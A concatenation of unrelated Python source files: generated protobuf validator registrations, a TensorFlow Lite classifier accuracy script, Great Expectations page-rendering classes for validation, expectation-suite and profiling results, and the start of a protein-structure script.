'DESCRIPTOR' : _VALIDOPTIONS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.ValidOptions)
})
_sym_db.RegisterMessage(ValidOptions)
CheckIf = _reflection.GeneratedProtocolMessageType('CheckIf', (_message.Message,), {
'DESCRIPTOR' : _CHECKIF,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.CheckIf)
})
_sym_db.RegisterMessage(CheckIf)
TagOptions = _reflection.GeneratedProtocolMessageType('TagOptions', (_message.Message,), {
'DESCRIPTOR' : _TAGOPTIONS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.TagOptions)
})
_sym_db.RegisterMessage(TagOptions)
OneOfTags = _reflection.GeneratedProtocolMessageType('OneOfTags', (_message.Message,), {
'DESCRIPTOR' : _ONEOFTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.OneOfTags)
})
_sym_db.RegisterMessage(OneOfTags)
FloatTags = _reflection.GeneratedProtocolMessageType('FloatTags', (_message.Message,), {
'DESCRIPTOR' : _FLOATTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.FloatTags)
})
_sym_db.RegisterMessage(FloatTags)
IntTags = _reflection.GeneratedProtocolMessageType('IntTags', (_message.Message,), {
'DESCRIPTOR' : _INTTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.IntTags)
})
_sym_db.RegisterMessage(IntTags)
UintTags = _reflection.GeneratedProtocolMessageType('UintTags', (_message.Message,), {
'DESCRIPTOR' : _UINTTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.UintTags)
})
_sym_db.RegisterMessage(UintTags)
StringTags = _reflection.GeneratedProtocolMessageType('StringTags', (_message.Message,), {
'DESCRIPTOR' : _STRINGTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.StringTags)
})
_sym_db.RegisterMessage(StringTags)
BytesTags = _reflection.GeneratedProtocolMessageType('BytesTags', (_message.Message,), {
'DESCRIPTOR' : _BYTESTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.BytesTags)
})
_sym_db.RegisterMessage(BytesTags)
BoolTags = _reflection.GeneratedProtocolMessageType('BoolTags', (_message.Message,), {
'DESCRIPTOR' : _BOOLTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.BoolTags)
})
_sym_db.RegisterMessage(BoolTags)
EnumTags = _reflection.GeneratedProtocolMessageType('EnumTags', (_message.Message,), {
'DESCRIPTOR' : _ENUMTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.EnumTags)
})
_sym_db.RegisterMessage(EnumTags)
MessageTags = _reflection.GeneratedProtocolMessageType('MessageTags', (_message.Message,), {
'DESCRIPTOR' : _MESSAGETAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.MessageTags)
})
_sym_db.RegisterMessage(MessageTags)
RepeatedTags = _reflection.GeneratedProtocolMessageType('RepeatedTags', (_message.Message,), {
'DESCRIPTOR' : _REPEATEDTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.RepeatedTags)
})
_sym_db.RegisterMessage(RepeatedTags)
MapTags = _reflection.GeneratedProtocolMessageType('MapTags', (_message.Message,), {
'DESCRIPTOR' : _MAPTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.MapTags)
})
_sym_db.RegisterMessage(MapTags)
if _descriptor._USE_C_DESCRIPTORS == False:
google_dot_protobuf_dot_descriptor__pb2.FieldOptions.RegisterExtension(field)
google_dot_protobuf_dot_descriptor__pb2.OneofOptions.RegisterExtension(oneof)
DESCRIPTOR._options = None
DESCRIPTOR._serialized_options = b'\n$io.github.yu31.protoc.pb.pbvalidatorB\013PBValidatorP\000Z0github.com/yu31/protoc-plugin/xgo/pb/pbvalidator'
_VALIDOPTIONS._serialized_start=70
_VALIDOPTIONS._serialized_end=159
_CHECKIF._serialized_start=161
_CHECKIF._serialized_end=222
_TAGOPTIONS._serialized_start=225
_TAGOPTIONS._serialized_end=672
_ONEOFTAGS._serialized_start=674
_ONEOFTAGS._serialized_end=721
_FLOATTAGS._serialized_start=724
_FLOATTAGS._serialized_end=911
_INTTAGS._serialized_start=914
_INTTAGS._serialized_end=1099
_UINTTAGS._serialized_start=1102
_UINTTAGS._serialized_end=1288
_STRINGTAGS._serialized_start=1291
_STRINGTAGS._serialized_end=4054
_BYTESTAGS._serialized_start=4057
_BYTESTAGS._serialized_end=4264
_BOOLTAGS._serialized_start=4266
_BOOLTAGS._serialized_end=4300
_ENUMTAGS._serialized_start=4303
_ENUMTAGS._serialized_end=4525
_MESSAGETAGS._serialized_start=4527
_MESSAGETAGS._serialized_end=4604
_REPEATEDTAGS._serialized_start=4607
_REPEATEDTAGS._serialized_end=4922
_MAPTAGS._serialized_start=4925
_MAPTAGS._serialized_end=5240
# @@protoc_insertion_point(module_scope)
|
py | b4103e8c3b1b205df3ac9a1e37adc7f5de358a4c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Classify all the test dataset through our CNN to get accuracy.
"""
import numpy as np
import operator
import random
import glob
import argparse
import os.path
from data import DataSet
from processor import process_image
from tensorflow.keras.models import load_model
#from tensorflow.contrib.lite.python import interpreter as interpreter_wrapper
from tensorflow.lite.python import interpreter as interpreter_wrapper
from tensorflow.keras.preprocessing import image
import tensorflow as tf
import tensorflow.keras.backend as KTF
config = tf.ConfigProto()
config.gpu_options.allow_growth=True #dynamic alloc GPU resource
config.gpu_options.per_process_gpu_memory_fraction = 0.3 #GPU memory threshold 0.3
session = tf.Session(config=config)
# set session
KTF.set_session(session)
def predict(saved_model, image_file):
interpreter = interpreter_wrapper.Interpreter(model_path=saved_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
# NxHxWxC, H:1, W:2
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
img = image.load_img(image_file, target_size=(height, width))
img = image.img_to_array(img)
# check the type of the input tensor
if input_details[0]['dtype'] == np.float32:
#img = preprocess_input(img)
img = img / 255.
#img = img/127.5 - 1
elif input_details[0]['dtype'] == np.uint8:
img = img.astype(np.uint8)
input_data = np.expand_dims(img, axis=0)
# Predict!
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
return output_data
def validate_cnn_model(model_file):
data = DataSet()
#model = load_model(model_file)
# Get all our test images.
images = glob.glob(os.path.join('data', 'test_full', '**', '*.jpg'))
# Count the correct predict
result_count = 0
for image in images:
print('-'*80)
# Get a random row.
#sample = random.randint(0, len(images) - 1)
#image = images[sample]
# Get groundtruth class string
class_str = image.split(os.path.sep)[-2]
# Turn the image into an array.
print(image)
#image_arr = process_image(image, (224, 224, 3))
#image_arr = np.expand_dims(image_arr, axis=0)
# Predict.
predictions = predict(model_file, image)
# Show how much we think it's each one.
label_predictions = {}
for i, label in enumerate(data.classes):
label_predictions[label] = predictions[0][i]
sorted_lps = sorted(label_predictions.items(), key=operator.itemgetter(1), reverse=True)
# Get top-1 predict class as result
predict_class_str = sorted_lps[0][0]
if predict_class_str == class_str:
result_count = result_count + 1
for i, class_prediction in enumerate(sorted_lps):
# Just get the top five.
if i > 4:
break
print("%s: %.2f" % (class_prediction[0], class_prediction[1]))
i += 1
print("\nval_acc: %f" % (result_count/float(len(images))))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--model_file', help='model file to predict', type=str)
args = parser.parse_args()
if not args.model_file:
raise ValueError('model file is not specified')
validate_cnn_model(args.model_file)
if __name__ == '__main__':
main()
|
py | b4103e959e31b1f18bd321c6fd2370272f3c4d16 | import logging
import os
from collections import OrderedDict, defaultdict
from typing import Dict, List, Tuple, Union
from dateutil.parser import parse
from great_expectations.core import ExpectationSuite
from great_expectations.core.expectation_validation_result import (
ExpectationSuiteValidationResult,
)
from great_expectations.core.run_identifier import RunIdentifier
from great_expectations.data_context.util import instantiate_class_from_config
from great_expectations.exceptions import ClassInstantiationError
from great_expectations.render.renderer.renderer import Renderer
from great_expectations.render.types import (
CollapseContent,
RenderedComponentContent,
RenderedDocumentContent,
RenderedHeaderContent,
RenderedMarkdownContent,
RenderedSectionContent,
RenderedStringTemplateContent,
RenderedTableContent,
TextContent,
)
from great_expectations.render.util import num_to_str
from great_expectations.validation_operators.types.validation_operator_result import (
ValidationOperatorResult,
)
logger = logging.getLogger(__name__)
class ValidationResultsPageRenderer(Renderer):
def __init__(
self,
column_section_renderer=None,
run_info_at_end: bool = False,
data_context=None,
):
"""
Args:
column_section_renderer:
run_info_at_end: Move the run info (Info, Batch Markers, Batch Kwargs) to the end
of the rendered output rather than after Statistics.
"""
super().__init__()
if column_section_renderer is None:
column_section_renderer = {
"class_name": "ValidationResultsColumnSectionRenderer"
}
module_name = "great_expectations.render.renderer.column_section_renderer"
self._column_section_renderer = instantiate_class_from_config(
config=column_section_renderer,
runtime_environment={},
config_defaults={
"module_name": column_section_renderer.get("module_name", module_name)
},
)
if not self._column_section_renderer:
raise ClassInstantiationError(
module_name=module_name,
package_name=None,
class_name=column_section_renderer["class_name"],
)
self.run_info_at_end = run_info_at_end
self._data_context = data_context
def render_validation_operator_result(
self, validation_operator_result: ValidationOperatorResult
) -> List[RenderedDocumentContent]:
"""
Render a ValidationOperatorResult which can have multiple ExpectationSuiteValidationResult
Args:
validation_operator_result: ValidationOperatorResult
Returns:
List[RenderedDocumentContent]
"""
return [
self.render(validation_result)
for validation_result in validation_operator_result.list_validation_results()
]
# TODO: deprecate dual batch api support in 0.14
def render(
self,
validation_results: ExpectationSuiteValidationResult,
evaluation_parameters=None,
):
# Gather run identifiers
run_name, run_time = self._parse_run_values(validation_results)
expectation_suite_name = validation_results.meta["expectation_suite_name"]
batch_kwargs = (
validation_results.meta.get("batch_kwargs", {})
or validation_results.meta.get("batch_spec", {})
or {}
)
# Add datasource key to batch_kwargs if missing
if "datasource" not in batch_kwargs and "datasource" not in batch_kwargs:
# Check if expectation_suite_name follows datasource.batch_kwargs_generator.data_asset_name.suite_name pattern
if len(expectation_suite_name.split(".")) == 4:
batch_kwargs["datasource"] = expectation_suite_name.split(".")[0]
columns = self._group_evrs_by_column(validation_results, expectation_suite_name)
overview_content_blocks = [
self._render_validation_header(validation_results),
self._render_validation_statistics(validation_results=validation_results),
]
collapse_content_blocks = [
self._render_validation_info(validation_results=validation_results)
]
collapse_content_block = self._generate_collapse_content_block(
collapse_content_blocks, validation_results
)
if not self.run_info_at_end:
overview_content_blocks.append(collapse_content_block)
sections = self._collect_rendered_document_content_sections(
validation_results,
overview_content_blocks,
collapse_content_blocks,
columns,
)
# Determine whether we have a custom run_name
data_asset_name = batch_kwargs.get("data_asset_name", "")
page_title = self._determine_page_title(
run_name, run_time, data_asset_name, expectation_suite_name
)
return RenderedDocumentContent(
**{
"renderer_type": "ValidationResultsPageRenderer",
"page_title": page_title,
"batch_kwargs": batch_kwargs
if "batch_kwargs" in validation_results.meta
else None,
"batch_spec": batch_kwargs
if "batch_spec" in validation_results.meta
else None,
"expectation_suite_name": expectation_suite_name,
"sections": sections,
"utm_medium": "validation-results-page",
}
)
def _parse_run_values(
self, validation_results: ExpectationSuiteValidationResult
) -> Tuple[str, str]:
run_id: Union[str, dict, RunIdentifier] = validation_results.meta["run_id"]
if isinstance(run_id, str):
try:
run_time = parse(run_id).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
except (ValueError, TypeError):
run_time = "__none__"
run_name = run_id
elif isinstance(run_id, dict):
run_name = run_id.get("run_name") or "__none__"
try:
t = run_id.get("run_time", "")
run_time = parse(t).strftime("%Y-%m-%dT%H:%M:%SZ")
except (ValueError, TypeError):
run_time = "__none__"
elif isinstance(run_id, RunIdentifier):
run_name = run_id.run_name or "__none__"
run_time = run_id.run_time.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
return run_name, run_time
def _group_evrs_by_column(
self,
validation_results: ExpectationSuiteValidationResult,
expectation_suite_name: str,
) -> Dict[str, list]:
columns = defaultdict(list)
try:
suite_meta = (
self._data_context.get_expectation_suite(expectation_suite_name).meta
if self._data_context is not None
else None
)
except:
suite_meta = None
meta_properties_to_render = self._get_meta_properties_notes(suite_meta)
for evr in validation_results.results:
if meta_properties_to_render is not None:
evr.expectation_config.kwargs[
"meta_properties_to_render"
] = meta_properties_to_render
if "column" in evr.expectation_config.kwargs:
column = evr.expectation_config.kwargs["column"]
else:
column = "Table-Level Expectations"
columns[column].append(evr)
return columns
def _generate_collapse_content_block(
self,
collapse_content_blocks: List[RenderedTableContent],
validation_results: ExpectationSuiteValidationResult,
) -> CollapseContent:
attrs = [
("batch_markers", "Batch Markers"),
("batch_kwargs", "Batch Kwargs"),
("batch_parameters", "Batch Parameters"),
("batch_spec", "Batch Spec"),
("batch_request", "Batch Definition"),
]
for attr, header in attrs:
if validation_results.meta.get(attr):
table = self._render_nested_table_from_dict(
input_dict=validation_results.meta.get(attr),
header=header,
)
collapse_content_blocks.append(table)
collapse_content_block = CollapseContent(
**{
"collapse_toggle_link": "Show more info...",
"collapse": collapse_content_blocks,
"styling": {
"body": {"classes": ["card", "card-body"]},
"classes": ["col-12", "p-1"],
},
}
)
return collapse_content_block
def _collect_rendered_document_content_sections(
self,
validation_results: ExpectationSuiteValidationResult,
overview_content_blocks: List[RenderedComponentContent],
collapse_content_blocks: List[RenderedTableContent],
columns: Dict[str, list],
) -> List[RenderedSectionContent]:
ordered_columns = Renderer._get_column_list_from_evrs(validation_results)
sections = [
RenderedSectionContent(
**{
"section_name": "Overview",
"content_blocks": overview_content_blocks,
}
)
]
if "Table-Level Expectations" in columns:
sections += [
self._column_section_renderer.render(
validation_results=columns["Table-Level Expectations"],
evaluation_parameters=validation_results.evaluation_parameters,
)
]
sections += [
self._column_section_renderer.render(
validation_results=columns[column],
evaluation_parameters=validation_results.evaluation_parameters,
)
for column in ordered_columns
]
if self.run_info_at_end:
sections += [
RenderedSectionContent(
**{
"section_name": "Run Info",
"content_blocks": collapse_content_blocks,
}
)
]
return sections
def _determine_page_title(
self,
run_name: str,
run_time: str,
data_asset_name: str,
expectation_suite_name: str,
) -> str:
try:
run_name_as_time = parse(run_name)
except ValueError:
run_name_as_time = None
try:
run_time_datetime = parse(run_time)
except ValueError:
run_time_datetime = None
include_run_name: bool = False
if run_name_as_time != run_time_datetime and run_name_as_time != "__none__":
include_run_name = True
page_title = f"Validations / {expectation_suite_name}"
if data_asset_name:
page_title += f" / {data_asset_name}"
if include_run_name:
page_title += f" / {run_name}"
page_title += f" / {run_time}"
return page_title
@classmethod
def _get_meta_properties_notes(cls, suite_meta):
"""
This method is used for fetching the custom meta to be added at the suite level
"notes": {
"content": {
"dimension": "properties.dimension",
"severity": "properties.severity"
},
"format": "renderer.diagnostic.meta_properties"
}
expectation level
{
"expectation_type": "expect_column_values_to_not_be_null",
"kwargs": {
"column": "city"
},
"meta": {
"attributes": {
"properties": {
"dimension": "completeness",
"severity": "P3"
},
"user_meta": {
"notes": ""
}
}
}
}
This will fetch dimension and severity values which are in the expectation meta.
"""
if (
suite_meta is not None
and "notes" in suite_meta
and "format" in suite_meta["notes"]
and suite_meta["notes"]["format"] == "renderer.diagnostic.meta_properties"
):
return suite_meta["notes"]["content"]
else:
return None
@classmethod
def _render_validation_header(cls, validation_results):
success = validation_results.success
expectation_suite_name = validation_results.meta["expectation_suite_name"]
expectation_suite_path_components = (
[".." for _ in range(len(expectation_suite_name.split(".")) + 3)]
+ ["expectations"]
+ str(expectation_suite_name).split(".")
)
expectation_suite_path = (
f"{os.path.join(*expectation_suite_path_components)}.html"
)
# TODO: deprecate dual batch api support in 0.14
batch_kwargs = (
validation_results.meta.get("batch_kwargs", {})
or validation_results.meta.get("batch_spec", {})
or {}
)
data_asset_name = batch_kwargs.get("data_asset_name")
if success:
success = "Succeeded"
html_success_icon = (
'<i class="fas fa-check-circle text-success" aria-hidden="true"></i>'
)
else:
success = "Failed"
html_success_icon = (
'<i class="fas fa-times text-danger" aria-hidden="true"></i>'
)
return RenderedHeaderContent(
**{
"content_block_type": "header",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Overview",
"tag": "h5",
"styling": {"classes": ["m-0"]},
},
}
),
"subheader": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "${suite_title} ${expectation_suite_name}\n ${data_asset} ${data_asset_name}\n ${status_title} ${html_success_icon} ${success}",
"params": {
"suite_title": "Expectation Suite:",
"data_asset": "Data asset:",
"data_asset_name": data_asset_name,
"status_title": "Status:",
"expectation_suite_name": expectation_suite_name,
"success": success,
"html_success_icon": html_success_icon,
},
"styling": {
"params": {
"suite_title": {"classes": ["h6"]},
"status_title": {"classes": ["h6"]},
"expectation_suite_name": {
"tag": "a",
"attributes": {"href": expectation_suite_path},
},
},
"classes": ["mb-0", "mt-1"],
},
},
}
),
"styling": {
"classes": ["col-12", "p-0"],
"header": {"classes": ["alert", "alert-secondary"]},
},
}
)
@classmethod
def _render_validation_info(cls, validation_results):
run_id = validation_results.meta["run_id"]
if isinstance(run_id, str):
try:
run_time = parse(run_id).strftime("%Y-%m-%dT%H:%M:%SZ")
except (ValueError, TypeError):
run_time = "__none__"
run_name = run_id
elif isinstance(run_id, dict):
run_name = run_id.get("run_name") or "__none__"
try:
run_time = str(
parse(run_id.get("run_time")).strftime("%Y-%m-%dT%H:%M:%SZ")
)
except (ValueError, TypeError):
run_time = "__none__"
elif isinstance(run_id, RunIdentifier):
run_name = run_id.run_name or "__none__"
run_time = run_id.run_time.strftime("%Y-%m-%dT%H:%M:%SZ")
# TODO: Deprecate "great_expectations.__version__"
ge_version = validation_results.meta.get(
"great_expectations_version"
) or validation_results.meta.get("great_expectations.__version__")
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Info",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": [
["Great Expectations Version", ge_version],
["Run Name", run_name],
["Run Time", run_time],
],
"styling": {
"classes": ["col-12", "table-responsive", "mt-1"],
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
},
},
}
)
@classmethod
def _render_nested_table_from_dict(cls, input_dict, header=None, sub_table=False):
table_rows = []
for kwarg, value in input_dict.items():
if not isinstance(value, (dict, OrderedDict)):
table_row = [
RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "$value",
"params": {"value": str(kwarg)},
"styling": {
"default": {"styles": {"word-break": "break-all"}},
},
},
"styling": {
"parent": {
"classes": ["pr-3"],
}
},
}
),
RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "$value",
"params": {"value": str(value)},
"styling": {
"default": {"styles": {"word-break": "break-all"}},
},
},
"styling": {
"parent": {
"classes": [],
}
},
}
),
]
else:
table_row = [
RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "$value",
"params": {"value": str(kwarg)},
"styling": {
"default": {"styles": {"word-break": "break-all"}},
},
},
"styling": {
"parent": {
"classes": ["pr-3"],
}
},
}
),
cls._render_nested_table_from_dict(value, sub_table=True),
]
table_rows.append(table_row)
table_rows.sort(key=lambda row: row[0].string_template["params"]["value"])
if sub_table:
return RenderedTableContent(
**{
"content_block_type": "table",
"table": table_rows,
"styling": {
"classes": ["col-6", "table-responsive"],
"body": {"classes": ["table", "table-sm", "m-0"]},
"parent": {"classes": ["pt-0", "pl-0", "border-top-0"]},
},
}
)
else:
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": header,
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": table_rows,
"styling": {
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
}
},
}
)
@classmethod
def _render_validation_statistics(cls, validation_results):
statistics = validation_results.statistics
statistics_dict = OrderedDict(
[
("evaluated_expectations", "Evaluated Expectations"),
("successful_expectations", "Successful Expectations"),
("unsuccessful_expectations", "Unsuccessful Expectations"),
("success_percent", "Success Percent"),
]
)
table_rows = []
for key, value in statistics_dict.items():
if statistics.get(key) is not None:
if key == "success_percent":
# table_rows.append([value, "{0:.2f}%".format(statistics[key])])
table_rows.append(
[value, f"{num_to_str(statistics[key], precision=4)}%"]
)
else:
table_rows.append([value, statistics[key]])
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Statistics",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": table_rows,
"styling": {
"classes": ["col-6", "table-responsive", "mt-1", "p-1"],
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
},
},
}
)
class ExpectationSuitePageRenderer(Renderer):
def __init__(self, column_section_renderer=None):
super().__init__()
if column_section_renderer is None:
column_section_renderer = {
"class_name": "ExpectationSuiteColumnSectionRenderer"
}
module_name = "great_expectations.render.renderer.column_section_renderer"
self._column_section_renderer = instantiate_class_from_config(
config=column_section_renderer,
runtime_environment={},
config_defaults={
"module_name": column_section_renderer.get("module_name", module_name)
},
)
if not self._column_section_renderer:
raise ClassInstantiationError(
module_name=column_section_renderer,
package_name=None,
class_name=column_section_renderer["class_name"],
)
def render(self, expectations):
if isinstance(expectations, dict):
expectations = ExpectationSuite(**expectations, data_context=None)
(
columns,
ordered_columns,
) = expectations.get_grouped_and_ordered_expectations_by_column()
expectation_suite_name = expectations.expectation_suite_name
overview_content_blocks = [
self._render_expectation_suite_header(),
self._render_expectation_suite_info(expectations),
]
table_level_expectations_content_block = self._render_table_level_expectations(
columns
)
if table_level_expectations_content_block is not None:
overview_content_blocks.append(table_level_expectations_content_block)
asset_notes_content_block = self._render_expectation_suite_notes(expectations)
if asset_notes_content_block is not None:
overview_content_blocks.append(asset_notes_content_block)
sections = [
RenderedSectionContent(
**{
"section_name": "Overview",
"content_blocks": overview_content_blocks,
}
)
]
sections += [
self._column_section_renderer.render(expectations=columns[column])
for column in ordered_columns
if column != "_nocolumn"
]
return RenderedDocumentContent(
**{
"renderer_type": "ExpectationSuitePageRenderer",
"page_title": f"Expectations / {str(expectation_suite_name)}",
"expectation_suite_name": expectation_suite_name,
"utm_medium": "expectation-suite-page",
"sections": sections,
}
)
def _render_table_level_expectations(self, columns):
table_level_expectations = columns.get("_nocolumn")
if not table_level_expectations:
return None
else:
expectation_bullet_list = self._column_section_renderer.render(
expectations=table_level_expectations
).content_blocks[1]
expectation_bullet_list.header = RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Table-Level Expectations",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
)
return expectation_bullet_list
@classmethod
def _render_expectation_suite_header(cls):
return RenderedHeaderContent(
**{
"content_block_type": "header",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Overview",
"tag": "h5",
"styling": {"classes": ["m-0"]},
},
}
),
"styling": {
"classes": ["col-12"],
"header": {"classes": ["alert", "alert-secondary"]},
},
}
)
@classmethod
def _render_expectation_suite_info(cls, expectations):
expectation_suite_name = expectations.expectation_suite_name
# TODO: Deprecate "great_expectations.__version__"
ge_version = expectations.meta.get(
"great_expectations_version"
) or expectations.meta.get("great_expectations.__version__")
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Info",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": [
["Expectation Suite Name", expectation_suite_name],
["Great Expectations Version", ge_version],
],
"styling": {
"classes": ["col-12", "table-responsive", "mt-1"],
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
},
},
}
)
# TODO: Update tests
@classmethod
def _render_expectation_suite_notes(cls, expectations):
content = []
total_expectations = len(expectations.expectations)
columns = []
for exp in expectations.expectations:
if "column" in exp.kwargs:
columns.append(exp.kwargs["column"])
total_columns = len(set(columns))
content += [
# TODO: Leaving these two paragraphs as placeholders for later development.
# "This Expectation suite was first generated by {BasicDatasetProfiler} on {date}, using version {xxx} of Great Expectations.",
# "{name}, {name}, and {name} have also contributed additions and revisions.",
"This Expectation suite currently contains %d total Expectations across %d columns."
% (
total_expectations,
total_columns,
),
]
if "notes" in expectations.meta:
notes = expectations.meta["notes"]
note_content = None
if isinstance(notes, str):
note_content = [notes]
elif isinstance(notes, list):
note_content = notes
elif isinstance(notes, dict):
if "format" in notes:
if notes["format"] == "string":
if isinstance(notes["content"], str):
note_content = [notes["content"]]
elif isinstance(notes["content"], list):
note_content = notes["content"]
else:
logger.warning(
"Unrecognized Expectation suite notes format. Skipping rendering."
)
elif notes["format"] == "markdown":
if isinstance(notes["content"], str):
note_content = [
RenderedMarkdownContent(
**{
"content_block_type": "markdown",
"markdown": notes["content"],
"styling": {"parent": {}},
}
)
]
elif isinstance(notes["content"], list):
note_content = [
RenderedMarkdownContent(
**{
"content_block_type": "markdown",
"markdown": note,
"styling": {"parent": {}},
}
)
for note in notes["content"]
]
else:
logger.warning(
"Unrecognized Expectation suite notes format. Skipping rendering."
)
else:
logger.warning(
"Unrecognized Expectation suite notes format. Skipping rendering."
)
if note_content is not None:
content += note_content
return TextContent(
**{
"content_block_type": "text",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Notes",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"text": content,
"styling": {
"classes": ["col-12", "table-responsive", "mt-1"],
"body": {"classes": ["table", "table-sm"]},
},
}
)
class ProfilingResultsPageRenderer(Renderer):
def __init__(self, overview_section_renderer=None, column_section_renderer=None):
super().__init__()
if overview_section_renderer is None:
overview_section_renderer = {
"class_name": "ProfilingResultsOverviewSectionRenderer"
}
if column_section_renderer is None:
column_section_renderer = {
"class_name": "ProfilingResultsColumnSectionRenderer"
}
module_name = "great_expectations.render.renderer.profiling_results_overview_section_renderer"
self._overview_section_renderer = instantiate_class_from_config(
config=overview_section_renderer,
runtime_environment={},
config_defaults={
"module_name": overview_section_renderer.get("module_name", module_name)
},
)
if not self._overview_section_renderer:
raise ClassInstantiationError(
module_name=module_name,
package_name=None,
class_name=overview_section_renderer["class_name"],
)
module_name = "great_expectations.render.renderer.column_section_renderer"
self._column_section_renderer = instantiate_class_from_config(
config=column_section_renderer,
runtime_environment={},
config_defaults={
"module_name": column_section_renderer.get("module_name", module_name)
},
)
if not self._column_section_renderer:
raise ClassInstantiationError(
module_name=module_name,
package_name=None,
class_name=column_section_renderer["class_name"],
)
def render(self, validation_results):
run_id = validation_results.meta["run_id"]
if isinstance(run_id, str):
try:
run_time = parse(run_id).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
except (ValueError, TypeError):
run_time = "__none__"
run_name = run_id
elif isinstance(run_id, dict):
run_name = run_id.get("run_name") or "__none__"
run_time = run_id.get("run_time") or "__none__"
elif isinstance(run_id, RunIdentifier):
run_name = run_id.run_name or "__none__"
run_time = run_id.run_time.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
expectation_suite_name = validation_results.meta["expectation_suite_name"]
batch_kwargs = validation_results.meta.get(
"batch_kwargs", {}
) or validation_results.meta.get("batch_spec", {})
# add datasource key to batch_kwargs if missing
if "datasource" not in batch_kwargs and "datasource" not in batch_kwargs:
# check if expectation_suite_name follows datasource.batch_kwargs_generator.data_asset_name.suite_name pattern
if len(expectation_suite_name.split(".")) == 4:
if "batch_kwargs" in validation_results.meta:
batch_kwargs["datasource"] = expectation_suite_name.split(".")[0]
else:
batch_kwargs["datasource"] = expectation_suite_name.split(".")[0]
# Group EVRs by column
# TODO: When we implement a ValidationResultSuite class, this method will move there.
columns = self._group_evrs_by_column(validation_results)
ordered_columns = Renderer._get_column_list_from_evrs(validation_results)
column_types = self._overview_section_renderer._get_column_types(
validation_results
)
data_asset_name = batch_kwargs.get("data_asset_name")
# Determine whether we have a custom run_name
try:
run_name_as_time = parse(run_name)
except ValueError:
run_name_as_time = None
try:
run_time_datetime = parse(run_time)
except ValueError:
run_time_datetime = None
include_run_name: bool = False
if run_name_as_time != run_time_datetime and run_name_as_time != "__none__":
include_run_name = True
page_title = f"Profiling Results / {str(expectation_suite_name)}"
if data_asset_name:
page_title += f" / {str(data_asset_name)}"
if include_run_name:
page_title += f" / {str(run_name)}"
page_title += f" / {str(run_time)}"
return RenderedDocumentContent(
**{
"renderer_type": "ProfilingResultsPageRenderer",
"page_title": page_title,
"expectation_suite_name": expectation_suite_name,
"utm_medium": "profiling-results-page",
"batch_kwargs": batch_kwargs
if "batch_kwargs" in validation_results.meta
else None,
"batch_spec": batch_kwargs
if "batch_spec" in validation_results.meta
else None,
"sections": [
self._overview_section_renderer.render(
validation_results, section_name="Overview"
)
]
+ [
self._column_section_renderer.render(
columns[column],
section_name=column,
column_type=column_types.get(column),
)
for column in ordered_columns
],
}
)
|
py | b4103f0e4900b89fcd4eea6f14c039e1ad491a1e | import sys,numpy as np
from modules import functions as f, transform_coords as tc
from tensorflow.keras.models import load_model
sst_dict = {'H': 0, 'E':1, 'L': 2}
dir_models = '/home/raulia/binders_nn/modules/models/'
def arr_ranges(data):
